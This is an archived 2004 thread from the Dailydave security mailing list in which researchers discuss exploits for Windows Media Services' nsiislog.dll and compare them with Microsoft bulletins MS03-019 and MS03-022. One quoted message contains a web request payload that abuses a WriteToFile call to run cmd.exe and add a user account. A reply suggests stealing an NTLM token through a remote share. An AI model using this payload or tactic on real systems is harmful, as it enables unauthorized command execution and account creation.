Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

RE: New mediaservices sploit

From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sun, 14 Mar 2004 21:52:55 +1300
Its late so I may be confused.. since its sunday, I most likely am.

Chunked Encoded Heap Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-019.mspx

Large Post Stack Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-022.mspx

And the revised bulletin last week was to fix an issue where if
media services was uninstalled and then the patch was applied,
and then media services was reinstalled, it would install the
old vulnerable dll.

http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
looks like an exploit for the stack based overflow... I haven't tested it
but the vulnerable .dll (well it shld be) is installed if somebody wants
to..

Brett




-----Original Message-----
From: dailydave-bounces () lists immunitysec com
[mailto:dailydave-bounces () lists immunitysec com]On Behalf Of Dave Aitel
Sent: Sunday, March 14, 2004 8:23 AM
To: dailydave () lists immunitysec com
Subject: Re: [Dailydave] New mediaservices sploit


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:

| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since its in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?


Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

|
| Brett actually found three bugs in this ISAPI; the original chunked
|  encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.


|
| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET
|
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]con
f/portlisten.conf,Listen%
|
| 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
|  20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD


You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\
and steal the token and relogin through NTLM auth?

- -dave



|
| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|>  accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.
|>  c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>
|> _______________________________________________ Dailydave mailing
|> list Dailydave () lists immunitysec com
|> http://www.immunitysec.com/mailman/listinfo/dailydave
|
| _______________________________________________ Dailydave mailing
| list Dailydave () lists immunitysec com
| http://www.immunitysec.com/mailman/listinfo/dailydave


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR
q3eaEdpJZeuG97kHz07TkOU=
=E4yX
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave

Attachment: midNSIISLOG.DLL
Description: 

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: